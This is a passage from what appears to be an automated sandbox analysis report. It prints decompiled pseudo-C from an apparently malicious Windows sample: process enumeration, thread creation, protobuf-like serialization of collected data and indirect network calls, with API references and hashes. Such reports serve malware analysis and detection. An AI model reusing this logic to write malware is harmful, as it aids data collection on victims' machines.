												__eax = E00E81750();
												__edx = _v64;
												if(__edx != 0) {
													__ecx = _v68;
													__eax = E00E88990(_v68, __edx);
													__esi = 0;
												}
												__eax = E00E81750();
												__edx = _v56;
												if(__edx != 0) {
													__ecx = _v60;
													__eax = E00E8A810(_v60, __edx);
													__esi = 0;
												}
											}
											GetProcessHeap() = HeapFree(__eax, 0, _v92);
										}
										GetProcessHeap() = HeapFree(__eax, 0, _v84);
									}
									GetProcessHeap() = HeapFree(__eax, 0, _v24);
									GetProcessHeap() = HeapFree(__eax, 0, _v16);
								} while (__esi == 0);
								__eax = GetTickCount();
								__eax = __eax + __esi;
								 *0xe8c280 = 4;
								 *0xe8c278 = __eax;
								GetProcessHeap() = HeapFree(__eax, 0, _v32);
								goto L24;
						}
					}
				}
				L25:
			}

0x00e88dda
0x00e88de6
0x00e8903d
0x00e89041
0x00e88dec
0x00e88dec
0x00e88df1
0x00e88df5
0x00000000
0x00e88dfb
0x00e88dfb
0x00000000
0x00e88e02
0x00e88e10
0x00000000
0x00000000
0x00e88e13
0x00e88e1d
0x00e88e22
0x00e88e25
0x00e88e41
0x00e88e4b
0x00e88e4f
0x00e88e27
0x00e88e28
0x00000000
0x00e88e2e
0x00e88e34
0x00e88e3a
0x00e88e3e
0x00e88e3e
0x00e88e28
0x00000000
0x00000000
0x00e88e52
0x00e88e5c
0x00e88e66
0x00e88e70
0x00e88e75
0x00e88e7a
0x00e88e7f
0x00e88e84
0x00e88e8e
0x00e88e93
0x00e88e9d
0x00e88ea1
0x00000000
0x00000000
0x00e88ea4
0x00e88ea8
0x00e88eb2
0x00e88eb7
0x00e88ebb
0x00e88ec0
0x00e88ec5
0x00e88eca
0x00e88ece
0x00e88edc
0x00e88ee0
0x00e88ee8
0x00e88ef0
0x00e88ef0
0x00e88ef4
0x00e88ef9
0x00e88efe
0x00e88f02
0x00e88f07
0x00e88f0b
0x00e88f16
0x00e88f21
0x00e88f30
0x00e88fb1
0x00e88fb6
0x00e88fbb
0x00e88fbe
0x00e88fcd
0x00e88f32
0x00e88f32
0x00e88f37
0x00e88f39
0x00e88f3e
0x00e88f40
0x00e88f45
0x00e88f49
0x00e88f54
0x00e88f56
0x00e88f5b
0x00e88f61
0x00e88f63
0x00e88f67
0x00e88f67
0x00e88f6c
0x00e88f71
0x00e88f77
0x00e88f79
0x00e88f7d
0x00e88f82
0x00e88f82
0x00e88f84
0x00e88f89
0x00e88f8f
0x00e88f91
0x00e88f95
0x00e88f9a
0x00e88f9a
0x00e88f8f
0x00e88fa9
0x00e88fa9
0x00e88fdf
0x00e88fdf
0x00e88ff2
0x00e89005
0x00e8900b
0x00e89013
0x00e8901d
0x00e8901f
0x00e8902b
0x00e89037
0x00000000
0x00000000
0x00e88dfb
0x00e88df5
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00E88DDA
SetEvent.KERNEL32 ref: 00E88E34
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00E8C2A8), ref: 00E88ED6
GetProcessHeap.KERNEL32(00000000,?), ref: 00E88FA2
HeapFree.KERNEL32(00000000), ref: 00E88FA9
GetProcessHeap.KERNEL32(00000000,?), ref: 00E88FD8
HeapFree.KERNEL32(00000000), ref: 00E88FDF
GetProcessHeap.KERNEL32(00000000,?), ref: 00E88FEB
HeapFree.KERNEL32(00000000), ref: 00E88FF2
GetProcessHeap.KERNEL32(00000000,?), ref: 00E88FFE
HeapFree.KERNEL32(00000000), ref: 00E89005
GetTickCount.KERNEL32 ref: 00E89013
GetProcessHeap.KERNEL32(00000000,?), ref: 00E89030
HeapFree.KERNEL32(00000000), ref: 00E89037

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$CountTick$Eventlstrlen
String ID:
API String ID: 1747682351-0
Opcode ID: 83f27002c54cbaabed4618c723d5b58f3b2f04f8e75a93022caf2d18b9919858
Instruction ID: 3207c732b17f3a4914bd5fb2cafb67475360521bcbb46c91d695e19261d28331
Opcode Fuzzy Hash: 83f27002c54cbaabed4618c723d5b58f3b2f04f8e75a93022caf2d18b9919858
Instruction Fuzzy Hash: FF519C725046009FD700FFE5ED8AA5A77F5FB86314F64191AF94DB22B1DB318808DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E88BB0, Relevance: 21.2, APIs: 14, Instructions: 154
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00E88BB0(char** __ecx) {
				short* _v8;
				long _v12;
				char** _v16;
				int* _v20;
				short _v540;
				char** _t39;
				short* _t49;
				int* _t61;
				int _t71;
				int _t73;
				signed int _t74;
				short* _t75;
				intOrPtr* _t80;
				long _t82;
				int _t83;
				char** _t84;
				WCHAR* _t86;
				char* _t87;

				_v12 = 0;
				_t73 = 0;
				_v16 = __ecx;
				 *__ecx = 0;
				_t39 =  &(__ecx[1]);
				_v20 = _t39;
				_v8 = 0;
				 *_t39 = 0;
				GetModuleFileNameW(0,  &_v540, 0x104);
				_t86 =  &(( &_v540)[lstrlenW( &_v540)]);
				if(_t86 >  &_v540) {
					while( *_t86 != 0x5c) {
						_t86 = _t86 - 2;
						if(_t86 >  &_v540) {
							continue;
						} else {
						}
						goto L6;
					}
					_t86 =  &(_t86[1]);
				}
				L6:
				E00E82110( &_v12);
				_t80 = _v12;
				if(_t80 != 0) {
					_t75 = 0;
					do {
						_t14 = _t80 + 4; // 0x4
						_t71 = lstrlenW(_t14);
						_t80 =  *_t80;
						_t75 = _t75 + 1 + _t71;
					} while (_t80 != 0);
					_v8 = _t75;
					_t73 = 0;
				}
				_t49 = RtlAllocateHeap(GetProcessHeap(), 8, _v8 + _v8);
				_v8 = _t49;
				if(_t49 == 0) {
					return 0 |  *_v16 != 0x00000000;
				} else {
					_t82 = _v12;
					while(_t82 != 0) {
						_t19 = _t82 + 4; // 0x4
						if(lstrcmpiW(_t19, _t86) == 0) {
							_t49 = _v8;
						} else {
							_t20 = _t82 + 4; // 0x4
							lstrcpyW( &(_v8[_t73]), _t20);
							_t24 = _t82 + 4; // 0x4
							_t74 = _t73 + lstrlenW(_t24);
							_t49 = _v8;
							_t49[_t74] = 0x2c;
							_t73 = _t74 + 1;
						}
						_t82 =  *_t82;
					}
					_t87 = 0;
					_t83 = WideCharToMultiByte(0xfde9, 0, _t49, _t73, 0, 0, 0, 0);
					if(_t83 != 0) {
						_t87 = RtlAllocateHeap(GetProcessHeap(), 8, _t83);
						if(_t87 != 0) {
							WideCharToMultiByte(0xfde9, 0, _v8, _t73, _t87, _t83, 0, 0);
							_t61 = _v20;
							if(_t61 != 0) {
								 *_t61 = _t83;
							}
						}
					}
					_t84 = _v16;
					 *_t84 = _t87;
					HeapFree(GetProcessHeap(), 0, _v8);
					return 0 |  *_t84 != 0x00000000;
				}
			}

0x00e88bbc
0x00e88bc3
0x00e88bc5
0x00e88bca
0x00e88bcc
0x00e88bcf
0x00e88bd7
0x00e88bde
0x00e88be8
0x00e88c01
0x00e88c0c
0x00e88c10
0x00e88c16
0x00e88c21
0x00000000
0x00000000
0x00e88c23
0x00000000
0x00e88c21
0x00e88c25
0x00e88c25
0x00e88c28
0x00e88c2b
0x00e88c30
0x00e88c35
0x00e88c37
0x00e88c40
0x00e88c40
0x00e88c44
0x00e88c4a
0x00e88c4d
0x00e88c4f
0x00e88c53
0x00e88c56
0x00e88c56
0x00e88c67
0x00e88c6d
0x00e88c72
0x00e88d4a
0x00e88c78
0x00e88c78
0x00e88c7d
0x00e88c80
0x00e88c8d
0x00e88cbb
0x00e88c8f
0x00e88c8f
0x00e88c9a
0x00e88ca0
0x00e88caa
0x00e88cb1
0x00e88cb4
0x00e88cb8
0x00e88cb8
0x00e88cbe
0x00e88cc0
0x00e88cc4
0x00e88cd8
0x00e88cdc
0x00e88cee
0x00e88cf2
0x00e88d06
0x00e88d0c
0x00e88d11
0x00e88d13
0x00e88d13
0x00e88d11
0x00e88cf2
0x00e88d15
0x00e88d1d
0x00e88d26
0x00e88d39
0x00e88d39

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E88BE8
lstrlenW.KERNEL32(?), ref: 00E88BF5
lstrlenW.KERNEL32(00000004), ref: 00E88C44
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E88C60
RtlAllocateHeap.NTDLL(00000000), ref: 00E88C67
lstrcmpiW.KERNEL32(00000004,?), ref: 00E88C85
lstrcpyW.KERNEL32(00000000,00000004), ref: 00E88C9A
lstrlenW.KERNEL32(00000004), ref: 00E88CA4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E88CD2
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E88CE1
RtlAllocateHeap.NTDLL(00000000), ref: 00E88CE8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E88D06
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E88D1F
HeapFree.KERNEL32(00000000), ref: 00E88D26

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Processlstrlen$AllocateByteCharMultiWide$FileFreeModuleNamelstrcmpilstrcpy
String ID:
API String ID: 2501218360-0
Opcode ID: ab919ea232ab7ab4947aa18d34fe6c879857c7211f9e8e539ea5d67e4a04e010
Instruction ID: 434b1f33a9185b8e46c820f7de561d5df79bcaf5982db5a8d78252f92f2cbff5
Opcode Fuzzy Hash: ab919ea232ab7ab4947aa18d34fe6c879857c7211f9e8e539ea5d67e4a04e010
Instruction Fuzzy Hash: FD51C172941219AFDB209FA5DD8CA9AFBB8FF45314F650464E90CF7250EB309D44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A690, Relevance: 15.1, APIs: 10, Instructions: 65
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00E8A690(void* __ecx) {
				void* _t15;
				void* _t22;
				void _t25;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
				_t33 = _t15;
				if(_t33 == 0) {
					return _t15;
				} else {
					 *_t33 =  *_t31;
					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
					_t4 = _t33 + 0x10; // 0x10
					_t29 = _t4;
					 *(_t33 + 8) = _t29;
					 *(_t33 + 0xc) =  *(_t31 + 0xc);
					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t32 == 0) {
						L5:
						return HeapFree(GetProcessHeap(), 0, _t33);
					}
					 *(_t32 + 4) =  *_t33;
					_t22 = CreateThread(0, 0, E00E8A3A0, _t33, 0, 0);
					 *(_t32 + 8) = _t22;
					if(_t22 == 0) {
						HeapFree(GetProcessHeap(), 0, _t32);
						goto L5;
					}
					_t25 =  *0xe8cbd4; // 0x0
					 *_t32 = _t25;
					 *0xe8cbd4 = _t32;
					return _t25;
				}
			}

0x00e8a692
0x00e8a6a4
0x00e8a6aa
0x00e8a6ae
0x00e8a743
0x00e8a6b4
0x00e8a6b6
0x00e8a6bb
0x00e8a6be
0x00e8a6be
0x00e8a6c1
0x00e8a6c7
0x00e8a6d1
0x00e8a6eb
0x00e8a6ef
0x00e8a731
0x00000000
0x00e8a73b
0x00e8a701
0x00e8a704
0x00e8a70a
0x00e8a70f
0x00e8a72b
0x00000000
0x00e8a72b
0x00e8a711
0x00e8a716
0x00e8a718
0x00e8a720
0x00e8a720

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,00E8A87A,?,000DBBA0,?,?,?,?,?,?,?,00E88F9A), ref: 00E8A69D
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00E8A6A4
memcpy.NTDLL(00000010,?,?,?,00000000,00E8A87A,?,000DBBA0,?,?,?,?,?,?,?,00E88F9A), ref: 00E8A6D1
GetProcessHeap.KERNEL32(00000008,0000000C,?,000DBBA0,?,?,?,?,?,?,?,00E88F9A), ref: 00E8A6DE
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00E8A6E5
CreateThread.KERNEL32(00000000,00000000,00E8A3A0,00000000,00000000,00000000), ref: 00E8A704
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00E88F9A), ref: 00E8A724
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00E88F9A), ref: 00E8A72B
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00E88F9A), ref: 00E8A734
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00E88F9A), ref: 00E8A73B

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree$CreateThreadmemcpy
String ID:
API String ID: 1978610079-0
Opcode ID: 910e242480b9c2d92162d3a5aaeef14454e883b15ac2bab8fbf0e2432f358a74
Instruction ID: 5e6991171394d118f365820cca2157b2a69b7effd6ea2f4b3241adc09f4bcd39
Opcode Fuzzy Hash: 910e242480b9c2d92162d3a5aaeef14454e883b15ac2bab8fbf0e2432f358a74
Instruction Fuzzy Hash: 53215C75641601AFE7205F6AEC4DF46BBB4FB49711F20841AFA5DE7691CB30E418CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E81C50, Relevance: 10.6, APIs: 7, Instructions: 97
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00E81C50(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v524;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t31;
				int _t32;
				void* _t35;
				intOrPtr* _t36;

				_t35 = 0;
				_v12 = 0x200;
				_t36 = __ecx;
				_t31 = __edx;
				_v8 = __edx;
				memset(__ecx, 0, 0x14);
				_push( &_v12);
				_push( &_v524);
				_push(0);
				if( *0xe8c0cc() >= 0) {
					_t32 = MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, 0, 0);
					if(_t32 != 0) {
						_t35 = RtlAllocateHeap(GetProcessHeap(), 8, _t32 + _t32);
						if(_t35 != 0) {
							MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, _t35, _t32);
						}
					}
					_t31 = _v8;
				}
				 *_t36 =  *0xe8c244(_t35, 0, 0, 0, 0);
				HeapFree(GetProcessHeap(), 0, _t35);
				_t19 =  *_t36;
				if(_t19 == 0) {
					L9:
					return 0;
				} else {
					_t21 =  *0xe8c254(_t19, _t31, _a4, 0, 0, 3, 0, 0);
					 *((intOrPtr*)(_t36 + 4)) = _t21;
					if(_t21 == 0) {
						 *0xe8c234( *_t36);
						goto L9;
					} else {
						 *((intOrPtr*)(_t36 + 0xc)) = 3;
						return 1;
					}
				}
			}

0x00e81c5e
0x00e81c60
0x00e81c67
0x00e81c69
0x00e81c6d
0x00e81c70
0x00e81c7c
0x00e81c83
0x00e81c84
0x00e81c8d
0x00e81ca2
0x00e81ca6
0x00e81cbb
0x00e81cbf
0x00e81cd0
0x00e81cd0
0x00e81cbf
0x00e81cd6
0x00e81cd6
0x00e81ceb
0x00e81cf4
0x00e81cfa
0x00e81cfe
0x00e81d39
0x00e81d3f
0x00e81d00
0x00e81d0f
0x00e81d15
0x00e81d1a
0x00e81d31
0x00000000
0x00e81d1d
0x00e81d1d
0x00e81d2e
0x00e81d2e
0x00e81d1a

APIs

memset.NTDLL ref: 00E81C70
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E81C9C
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E81CAE
RtlAllocateHeap.NTDLL(00000000), ref: 00E81CB5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E81CD0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E81CED
HeapFree.KERNEL32(00000000), ref: 00E81CF4

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$ByteCharMultiProcessWide$AllocateFreememset
String ID:
API String ID: 4040929015-0
Opcode ID: cb1589fb77941af69c815272f07c6086228af35add3dcf823e2579b830d9d959
Instruction ID: 9432c1a044c2caa4c68c9551bed78a8379ed197086d4b97442e9333f166a13a2
Opcode Fuzzy Hash: cb1589fb77941af69c815272f07c6086228af35add3dcf823e2579b830d9d959
Instruction Fuzzy Hash: DF316171640304BFE7205BA6AC8DF97BBBCEB86711F200155B618E61D1DA7099458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00E89F80, Relevance: 9.2, APIs: 6, Instructions: 199
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E89F80(intOrPtr* __ecx, unsigned int* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				long _t50;
				signed char _t61;
				signed char _t63;
				signed char _t65;
				signed char _t67;
				signed char _t69;
				intOrPtr _t71;
				intOrPtr* _t72;
				int _t73;
				int _t74;
				int _t75;
				intOrPtr _t77;
				signed char _t78;
				signed char _t80;
				signed char _t82;
				signed char _t84;
				signed char _t86;
				intOrPtr _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				int _t93;
				signed char* _t94;
				void* _t95;
				intOrPtr _t96;
				char* _t99;
				signed char* _t100;
				signed char* _t101;
				void* _t102;
				char* _t103;
				signed char* _t104;
				void* _t105;
				char* _t106;
				signed char* _t107;
				void* _t108;
				char* _t109;
				signed char* _t110;

				_t94 = __edx;
				_v16 = __ecx;
				_t96 = 1;
				_v12 = 1;
				_t37 =  *__edx;
				if(_t37 > 0x7f) {
					do {
						_t37 = _t37 >> 7;
						_t96 = _t96 + 1;
					} while (_t37 > 0x7f);
					_v12 = _t96;
				}
				_t4 =  &(_t94[8]); // 0x0
				_t38 =  *_t4;
				_t77 = 1;
				while(_t38 > 0x7f) {
					_t38 = _t38 >> 7;
					_t77 = _t77 + 1;
				}
				_t5 =  &(_t94[0x18]); // 0x0
				_t39 =  *_t5;
				_t89 = 1;
				while(_t39 > 0x7f) {
					_t39 = _t39 >> 7;
					_t89 = _t89 + 1;
				}
				_t6 =  &(_t94[0x20]); // 0x0
				_t40 =  *_t6;
				_t71 = 1;
				while(_t40 > 0x7f) {
					_t40 = _t40 >> 7;
					_t71 = _t71 + 1;
				}
				_t7 =  &(_t94[0x28]); // 0x0
				_t41 =  *_t7;
				_v8 = 1;
				while(_t41 > 0x7f) {
					_v8 = _v8 + 1;
					_t41 = _t41 >> 7;
				}
				_t11 =  &(_t94[0x28]); // 0x0
				_t12 =  &(_t94[0x20]); // 0x0
				_t13 =  &(_t94[0x18]); // 0x0
				_t14 =  &(_t94[8]); // 0x0
				_t72 = _v16;
				_t50 =  *_t11 +  *_t12 +  *_t13 +  *_t14 + _v8 + _t71 + _t89 + _t77 + _v12 + 0xf;
				 *(_t72 + 4) = _t50;
				_t99 = RtlAllocateHeap(GetProcessHeap(), 0, _t50);
				 *_t72 = _t99;
				if(_t99 != 0) {
					 *_t99 = 8;
					_t100 = _t99 + 1;
					_t78 =  *_t94;
					while(_t78 > 0x7f) {
						_t69 = _t78;
						_t78 = _t78 >> 7;
						 *_t100 = _t69 | 0x00000080;
						_t100 =  &(_t100[1]);
					}
					 *_t100 = _t78 & 0x0000007f;
					_t100[1] = 0x12;
					_t101 =  &(_t100[2]);
					_t20 =  &(_t94[8]); // 0x0
					_t73 =  *_t20;
					_t80 = _t73;
					_t21 =  &(_t94[4]); // 0x0
					_t90 =  *_t21;
					if(_t73 > 0x7f) {
						do {
							_t67 = _t80;
							_t80 = _t80 >> 7;
							 *_t101 = _t67 | 0x00000080;
							_t101 =  &(_t101[1]);
						} while (_t80 > 0x7f);
					}
					 *_t101 = _t80 & 0x0000007f;
					_t102 =  &(_t101[1]);
					memcpy(_t102, _t90, _t73);
					_t103 = _t102 + _t73;
					 *_t103 = 0x1d;
					_t22 =  &(_t94[0xc]); // 0x0
					 *(_t103 + 1) =  *_t22;
					 *((char*)(_t103 + 5)) = 0x25;
					_t25 =  &(_t94[0x10]); // 0x0
					 *(_t103 + 6) =  *_t25;
					 *((char*)(_t103 + 0xa)) = 0x2a;
					_t104 = _t103 + 0xb;
					_t28 =  &(_t94[0x18]); // 0x0
					_t74 =  *_t28;
					_t82 = _t74;
					_t29 =  &(_t94[0x14]); // 0x0
					_t91 =  *_t29;
					if(_t74 > 0x7f) {
						do {
							_t65 = _t82;
							_t82 = _t82 >> 7;
							 *_t104 = _t65 | 0x00000080;
							_t104 =  &(_t104[1]);
						} while (_t82 > 0x7f);
					}
					 *_t104 = _t82 & 0x0000007f;
					_t105 =  &(_t104[1]);
					memcpy(_t105, _t91, _t74);
					_t106 = _t105 + _t74;
					 *_t106 = 0x32;
					_t107 = _t106 + 1;
					_t30 =  &(_t94[0x20]); // 0x0
					_t75 =  *_t30;
					_t84 = _t75;
					_t31 =  &(_t94[0x1c]); // 0x0
					_t92 =  *_t31;
					if(_t75 > 0x7f) {
						do {
							_t63 = _t84;
							_t84 = _t84 >> 7;
							 *_t107 = _t63 | 0x00000080;
							_t107 =  &(_t107[1]);
						} while (_t84 > 0x7f);
					}
					 *_t107 = _t84 & 0x0000007f;
					_t108 =  &(_t107[1]);
					memcpy(_t108, _t92, _t75);
					_t109 = _t108 + _t75;
					 *_t109 = 0x3a;
					_t110 = _t109 + 1;
					_t32 =  &(_t94[0x28]); // 0x0
					_t93 =  *_t32;
					_t86 = _t93;
					_t33 =  &(_t94[0x24]); // 0x0
					_t95 =  *_t33;
					if(_t93 > 0x7f) {
						do {
							_t61 = _t86;
							_t86 = _t86 >> 7;
							 *_t110 = _t61 | 0x00000080;
							_t110 =  &(_t110[1]);
						} while (_t86 > 0x7f);
					}
					 *_t110 = _t86 & 0x0000007f;
					memcpy( &(_t110[1]), _t95, _t93);
					_t72 = _v16;
				}
				return 0 |  *_t72 != 0x00000000;
			}

0x00e89f89
0x00e89f8b
0x00e89f8e
0x00e89f93
0x00e89f96
0x00e89f9b
0x00e89fa0
0x00e89fa0
0x00e89fa3
0x00e89fa4
0x00e89fa9
0x00e89fa9
0x00e89fac
0x00e89fac
0x00e89faf
0x00e89fb7
0x00e89fc0
0x00e89fc3
0x00e89fc4
0x00e89fc9
0x00e89fc9
0x00e89fcc
0x00e89fd4
0x00e89fd6
0x00e89fd9
0x00e89fda
0x00e89fdf
0x00e89fdf
0x00e89fe2
0x00e89fea
0x00e89ff0
0x00e89ff3
0x00e89ff4
0x00e89ff9
0x00e89ff9
0x00e89ffc
0x00e8a006
0x00e8a010
0x00e8a013
0x00e8a016
0x00e8a01b
0x00e8a01e
0x00e8a021
0x00e8a024
0x00e8a02f
0x00e8a039
0x00e8a03e
0x00e8a04e
0x00e8a050
0x00e8a054
0x00e8a05a
0x00e8a05d
0x00e8a05e
0x00e8a063
0x00e8a065
0x00e8a067
0x00e8a06c
0x00e8a06e
0x00e8a06f
0x00e8a077
0x00e8a079
0x00e8a07d
0x00e8a080
0x00e8a080
0x00e8a083
0x00e8a085
0x00e8a085
0x00e8a08b
0x00e8a090
0x00e8a090
0x00e8a092
0x00e8a097
0x00e8a099
0x00e8a09a
0x00e8a090
0x00e8a0a3
0x00e8a0a5
0x00e8a0a8
0x00e8a0ae
0x00e8a0b3
0x00e8a0b6
0x00e8a0b9
0x00e8a0bc
0x00e8a0c0
0x00e8a0c3
0x00e8a0c6
0x00e8a0ca
0x00e8a0cd
0x00e8a0cd
0x00e8a0d0
0x00e8a0d2
0x00e8a0d2
0x00e8a0d8
0x00e8a0e0
0x00e8a0e0
0x00e8a0e2
0x00e8a0e7
0x00e8a0e9
0x00e8a0ea
0x00e8a0e0
0x00e8a0f3
0x00e8a0f5
0x00e8a0f8
0x00e8a0fe
0x00e8a103
0x00e8a106
0x00e8a107
0x00e8a107
0x00e8a10a
0x00e8a10c
0x00e8a10c
0x00e8a112
0x00e8a114
0x00e8a114
0x00e8a116
0x00e8a11b
0x00e8a11d
0x00e8a11e
0x00e8a114
0x00e8a127
0x00e8a129
0x00e8a12c
0x00e8a132
0x00e8a137
0x00e8a13a
0x00e8a13b
0x00e8a13b
0x00e8a13e
0x00e8a140
0x00e8a140
0x00e8a146
0x00e8a148
0x00e8a148
0x00e8a14a
0x00e8a14f
0x00e8a151
0x00e8a152
0x00e8a148
0x00e8a15b
0x00e8a160
0x00e8a166
0x00e8a169
0x00e8a179

APIs

GetProcessHeap.KERNEL32(00000000,00000001,?,000DBBA0), ref: 00E8A041
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00E8A048
memcpy.NTDLL(00000000,00000000,00000000,?,000DBBA0), ref: 00E8A0A8

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessmemcpy
String ID:
API String ID: 1874444438-0
Opcode ID: b3543acbc7f67cb37e6bdfde5ef2662161ff49817dce829cd97ff1e419a8d29a
Instruction ID: a6164cb16ff4a0af8306d3eb5776eeb386af9e97a6adc69eae990ea5ac7896be
Opcode Fuzzy Hash: b3543acbc7f67cb37e6bdfde5ef2662161ff49817dce829cd97ff1e419a8d29a
Instruction Fuzzy Hash: 9061D4709006519FE3249F19C4C476AFBE4FF2A714F38556DE88D9BB02C324A896D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E88990, Relevance: 9.1, APIs: 6, Instructions: 95
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E88990(signed char __ecx, void* __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed char _v16;
				intOrPtr _v20;
				void* _v24;
				char _v28;
				signed char _t25;
				void* _t31;
				intOrPtr _t34;
				void* _t36;
				void _t38;
				signed char _t39;
				signed char _t41;
				signed int _t47;
				intOrPtr _t50;
				void* _t51;
				signed char _t52;

				_t52 = __ecx;
				_t50 = __ecx + __edx;
				_v8 = _t50;
				while(1) {
					_t47 = 0;
					_t41 = 0;
					_v12 = 0;
					_t39 = 0x80;
					if(_t52 >= _t50) {
						goto L6;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t39 =  *_t52;
						_t52 = _t52 + 1;
						_t47 = _t47 | (_t39 & 0x7f) << _t41;
						if(_t39 >= 0) {
							break;
						}
						_t41 = _t41 + 7;
						if(_t52 < _t50) {
							continue;
						}
						break;
					}
					_v12 = _t47;
					L6:
					_t25 =  !((_t39 & 0x000000ff) >> 7);
					if((_t25 & 0x00000001) != 0) {
						_t25 = _t47 + _t52;
						if(_t25 <= _t50) {
							_v16 = _t52;
							_t52 = _t25;
							_t25 = E00E887C0( &_v16,  &_v28);
							if(_t25 != 0) {
								_t51 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
								if(_t51 == 0) {
									L1:
									_t50 = _v8;
									continue;
								} else {
									_t31 = E00E81F40(_v24, _v20);
									 *(_t51 + 8) = _t31;
									if(_t31 == 0) {
